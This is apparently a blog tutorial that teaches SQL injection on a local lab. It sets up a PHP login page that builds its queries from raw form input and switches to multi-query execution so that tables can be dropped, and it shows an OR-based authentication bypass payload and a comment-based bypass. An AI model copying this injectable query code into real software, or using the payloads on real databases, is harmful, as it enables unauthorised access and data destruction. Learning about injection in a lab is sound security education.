Skip to main content

SQL INJECTION


What is SQL INJECTION


  • SQL INJECTION is getting Unauthorized access to database.
  • After successful authentication by SQL injection attacker tries to harm or dispose or cause any type of harm to a database. 
  • A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. 
  • SQL injection we try to use SQL comments or using logical Boolean relational algebra i.e (OR & AND clause) to get data from db.

How to Perform basic SQL injection


Make a basic html form page without providing front end validation.
Make a Folder in your local host directory as test
HTML FORM AS index.html in your localhost directory(var/WWW/html/test)
or in ht docs in XAMPP
then add this HTML simple form as index.html

<!DOCTYPE html>
<html>
<body>
                <form action="action.php" method="post">
<div>
<h2><b>Please Enter Details</b></h2>
Name:<input type="text" name="name">
Password:<input type="password" name="pass">
<input type="Submit" valiie=submit>
</div>
</form>
<style>
body{
                color:blue;
background-color:purple;}
form{margin-left:10%;
margin-right:30%;
margin-top:5%;
background-color:yellow;
}
div{
padding-left:10%;
padding-bottom:5%;
}
input{
padding-bottom:10px;
display:block;
margin-bottom:3%;
}
</style>
</body>
</html>


Then Open it on localhost
Make Another Php page save it as action.php

<?php
$username=$_POST['name'];
$password=$_POST['pass'];
$con=mysqli_connect('localhost','root','root','test');

$query=mysqli_query($con,"SELECT * FROM `login` WHERE `username` = '$username' AND password= '$password'");
//echo "SELECT * FROM `login` WHERE `username` = '$username' AND password= '$password'";
if(mysqli_num_rows($query)==1)
echo "Sucessful";
else
 echo "failed";
?>
Now Goto phpmyadmin and make a db name test then add a table login and this Structure 

Then Add a few Entries as you wish 
( INSERT INTO `login`(`username`, `password`) VALUES ([value-1],[value-2]))

now check whether you can login successfully or not by providing correct username and password if you provide incorrect name or password it prints failed.

On Providing wrong password it gives failed Right
IN SQL injection we will try to access without providing password we will get successful.Now if you uncomment the echo you are able to see the query executed in SQL
Example:
if i have data username="zohar" and password="1234" in my database
if i provide name ="zohar" and password as blank and press submit 


  • SELECT * FROM `login` WHERE `username` = 'zohar' AND password= ''failed
now to access this we provide name=zohar' OR '1==1 and password as blank and submit

  • SELECT * FROM `login` WHERE `username` = 'zohar' OR '1==1' AND password= ''Sucessful
Now We are Successfully Able to access the database.
So this means Providing zohar' OR '1==1 we were able to access the database successfully.
IF you open sql in phpmyadmin
type this query
SELECT * FROM `login` WHERE `username` = 'YOUR USERNAME FROM DB' /* '' AND password= ''


we can see it success fully executed commenting out password but since mysqli provides security from multi line comment we cannot inject with multiline comments which is /*
mysqli also doesnot allow to execute multiple queries like previous mysql so we have to check if mysqli_multi_query() function is used or not to drop table or drop database
Now to drop tables and database we change out php scipt
<?php
$username=$_POST['name'];
$password=$_POST['pass'];
$con=mysqli_connect('localhost','root','root','test');

 $query=mysqli_multi_query($con,"SELECT * FROM `login` WHERE `username` = '$username' AND password= '$password'");
echo "SELECT * FROM `login` WHERE `username` = '$username' AND password= '$password'";
if($query)
echo "Sucessful";
else
 echo "failed";
?>
Now We will first make a backup of our database.
Now Finally we will trop the table of database.
We will make changes to password to make it visible make input type from password to text
then Simply do the following steps:-


Now Restore the database from the backup which we created before.
Similarly to drop table we will do a drop database.



test database is dropped

Labels:

Comments

Post a Comment

Popular posts from this blog

Columnar Transposition Cipher

Columnar Transposition Cipher Introduction  The columnar transposition cipher is a fairly simple, easy to implement cipher. It is a transposition cipher that follows a simple rule for mixing up the characters in the plaintext to form the ciphertext. Although weak on its own, it can be combined with other ciphers, such as a substitution cipher, the combination of which can be more difficult to break than either cipher on it's own. The  ADFGVX cipher uses a columnar transposition to greatly improve its security. Example  The key for the columnar transposition cipher is a keyword e.g.  GERMAN . The row length that is used is the same as the length of the keyword. To encrypt a piece of text, e.g. defend the east wall of the castle we write it out in a special way in a number of rows (the keyword here is  GERMAN ): G E R M A N d e f e n d t h e e a s t w a l l o f t h e c a s t l e x x In the above example, the plaintext has been padded so that ...
Post a Comment
Read more

A Case Study On End-to-End Encryption Used In Whatsapp

A Case Study On End-to-End Encryption Used In Whatsapp 1.Introduction to End-to-End Encryption WhatsApp's end-to-end encryption is available when you and the people you message use the latest versions of the app. WhatsApp's end-to-end encryption ensures only you and the person you're communicating with can read what is sent, and nobody in between, not even WhatsApp. This is because your messages are secured with a lock, and only the recipient and you have the special key needed to unlock and read them. For added protection, every message you send has its own unique lock and key. WhatsApp, since its inception six years ago, has quickly grown into a global phenomenon, becoming one of the most popular mobile based communications applications in the world today. With a user base that eclipsed one billion in February, WhatsApp provides a service that potentially endangers the privacy of over 10% of the entire human population. In order to address these security concern...
Post a Comment
Read more

UPD Attack in Python

UDP flood attack A UDP flood attack is a denial-of-service (DoS) attack using the User Datagram Protocol (UDP), a sessionless/connectionless computer networking protocol. Using UDP for denial-of-service attacks is not as straightforward as with the Transmission Control Protocol (TCP). However, a UDP flood attack can be initiated by sending a large number of UDP packets to random ports on a remote host. As a result, the distant host will: Check for the application listening at that port; See that no application listens at that port; Reply with an ICMP Destination Unreachable packet. Thus, for a large number of UDP packets, the victimized system will be forced into sending many ICMP packets, eventually leading it to be unreachable by other clients. The attacker(s) may also spoof the IP address of the UDP packets, ensuring that the excessive ICMP return packets do not reach them, and anonymizing their network location(s). Most operating systems mit...
Post a Comment
Read more